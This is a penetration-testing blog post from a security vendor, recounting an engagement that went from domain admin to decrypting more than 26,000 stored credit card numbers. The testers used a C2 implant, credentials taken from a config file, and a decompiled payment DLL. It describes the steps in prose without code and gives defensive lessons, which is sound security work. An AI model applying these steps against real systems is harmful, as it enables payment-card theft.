Skip to main content
Core Security Logo Core Security Logo
  • Contact Us
  • Support
  • All Fortra Products
  • FREE TRIALS
  • Contact Us
  • Support
  • All Fortra Products
  • FREE TRIALS
  • Cyber Threat

      Products

      • Core Impact Penetration testing software
      • Cobalt Strike Red team software
      • Outflank Security Tooling (OST) Evasive attack simulation
      • Event Manager Security information and event management
      • Powertech Antivirus Server-level virus protection
      • Product Bundles

      Solutions

      • Penetration Testing
      • Penetration Testing Services
      • Offensive Security
      • Threat Detection
      • Security Information and Event Management
    • Penetration Testing Services Security consulting services
  • Identity

      Products

      • Access Assurance Suite User provisioning and governance
      • Core Password & Secure Reset Self-service password management
      • Core Privileged Access Manager (BoKS) Privileged access management (PAM)

      Solutions

      • Privileged Access Management
      • Identity Governance & Administration
      • Password Management
    • See How to Simplify Access in Your Organization | Request a Demo
  • Industries
    • Healthcare
    • Financial Services
    • Federal Government
    • Retail
    • Utilities & Energy
    • Higher Education
    • Compliance
  • Resources
    • Upcoming Webinars & Events
    • Blogs
    • Case Studies
    • Videos
    • Datasheets
    • Guides
    • Ecourses
    • Compliance
    • All Resources
  • CoreLabs
    • Advisories
    • Exploits
    • Publications
    • Articles
    • Open Source Tools
  • About
    • Partners
    • Careers
    • Press Releases
    • Contact Us
  1. Home
  2. Blog
  3. Active Directory Attack Scenarios Part 2: Going Beyond Domain Admin

Active Directory Attack Scenarios Part 2: Going Beyond Domain Admin

In this series focusing on Active Directory attacks, we’re running through four different scenarios based on real penetration testing engagements that demonstrate the variety of techniques and tactics that can be used to compromise Active Directory. In part one, we explored how attackers can take advantage of ignored assets like network connected printers and use them as attack vectors, eventually gaining control of domain admin. In this second scenario, we’ll explore how to use domain admin control as a means to get to an organization’s most valuable assets.

Assumed Breach: Beginning with Elevated Privileges

Penetration testing engagements are not always about what it takes to gain access to an IT environment from an external starting point. Much of the time, testers demonstrate what an attacker would do once inside—how they pivot between systems and escalate privileges. In this case, we began with domain administrator privileges with a goal of assessing the security of the PCI network, which consists of systems that impact the cardholder data environment (CDE) of an any organization that handles credit card payments.

Deploying Agents to Gain Insights

We started by deploying a Cobalt Strike agent—a C2 implant—in one of the servers in order to inspect its inner workings. With this visibility, we explored the network interactions, observing several connections to an Oracle database which could potentially house payment related information. After inspecting web application logs from an application that was running on the server, we found indicators that credit cards were likely being handled or processed by this application.

Image
Deploying agents to gain insights

Uncovering Sensitive Information

With this evidence in hand, we next retrieved the web config file, from which we pulled the database credentials. Using these credentials, we accessed the database to see if our theory was correct. Just as we suspected, it was storing credit card numbers for different users. However, they were encrypted, so more work would need to be done before someone could extract and use these numbers.

Image
uncovering sensitive information

Commandeering Built-In Decryption

Consequently, our next step was to explore the possibility of deciphering these numbers. We dug deeper to see if decrypting capabilities were available in the payment application that we looked at earlier. It turned out that the application wasn’t obfuscated in any way, so it was fairly easy to decompile DLL services using DNSpy.  We found an interesting class called PaymentWrapper that implemented a method called SaveCardInfo. This method called another method, EncodeDecode String, which was being used to encode and decode information from the database. Some of the information was hard coded  in the source code, exposing private data. For example, we were able to pull credentials for the SOAP service that the app was using for encryption and decryption.

Image
encode decode
Image
built in decyption

At this point, we had gathered a great deal of information from the web config file, the decompiled DLL, and the database itself. We had the username, password, SOAP API endpoint, database name, and more. Combining all of this information would allow us to recreate and complete the EncodeDecode method call ourselves, enabling us to extract decrypted credit card numbers.

Validating the Process

When we initially pulled the user information, including the encrypted credit card numbers, there was a column that listed the last four digits of the credit card numbers. These are often listed separately and left unencrypted as way for applications to verify card in payment information processes in which a user has saved their credit card information. They are able to select and verify their saved method of payment by seeing the last four digits of their card. For example:

Image
validating the process

We were also able to use these four digits to validate if our decryption had been successful. After extracting the decoded numbers, we compared them against these four numbers to ensure they matched up.

Conclusions: Going Beyond Compliance

While many attack scenarios focus on taking over Active Directory, it is also important to run engagements to demonstrate what could happen after domain admin control is achieved. In this case, it served as means of obtaining the company's most valuable assets. Ultimately, we found and compromised more than 26,000 credit card numbers being stored in the database.

This case also highlights the importance of both maintaining and surpassing compliance regulations. While PCI DSS explicitly requires internal penetration testing, many other regulations have more vague language around what type of assessments are needed. While it’s important to protect your perimeter as much as possible, no environment is impenetrable. Attention must also be paid to internal security controls that can help limit the damage of a threat actor who has breached the gates. By finding potential pivot points and privilege escalation opportunities, internal testing efforts are the safest way to find out just how severe the impact of such an attack may be.

Meet the Author

Fernando Diaz

Senior Security Consultant
Core Security, by Fortra
View Profile
Related Products
Penetration Testing Services
Related Content
active-directory-attack-scenarios-part-one-print
Blog
Active Directory Attack Scenarios: The Path from Printer to Domain Admin
Digital lock
Video
Getting Inside the Mind of an Attacker: Going Beyond the Exploitation of Software Vulnerabilities
External Attacks on Active Directory
Video
Getting Inside the Mind of an Attacker: Active Directory Attack Scenarios

Find out what else can happen after an attack on Active Directory

CTA Text

Find out how attackers attempt to achieve persistence in our webinar, Getting Inside the Mind of an Attacker: After the Breach - Next Steps After Compromising Active Directory.

WATCH THE WEBINAR
  • Email Core Security Email Us
  • Twitter Find us on Twitter
  • LinkedIn Find us on LinkedIn
  • Facebook Find us on Facebook

Products

  • Access Assurance Suite
  • Core Impact
  • Cobalt Strike
  • Event Manager
  • Browse All Products

Solutions

  • Identity Governance

  • PAM
  • IGA
  • IAM
  • Password Management
  • Vulnerability Management
  • Compliance
  • Cyber Threat

  • Penetration Testing
  • Red Team
  • Phishing
  • Threat Detection
  • SIEM

Resources

  • Upcoming Webinars & Events
  • Corelabs Research
  • Blog
  • Training

About

  • Our Company
  • Partners
  • Careers
  • Accessibility

Support

Privacy Policy

Contact

Impressum

Copyright © Fortra, LLC and its group of companies. All trademarks and registered trademarks are the property of their respective owners.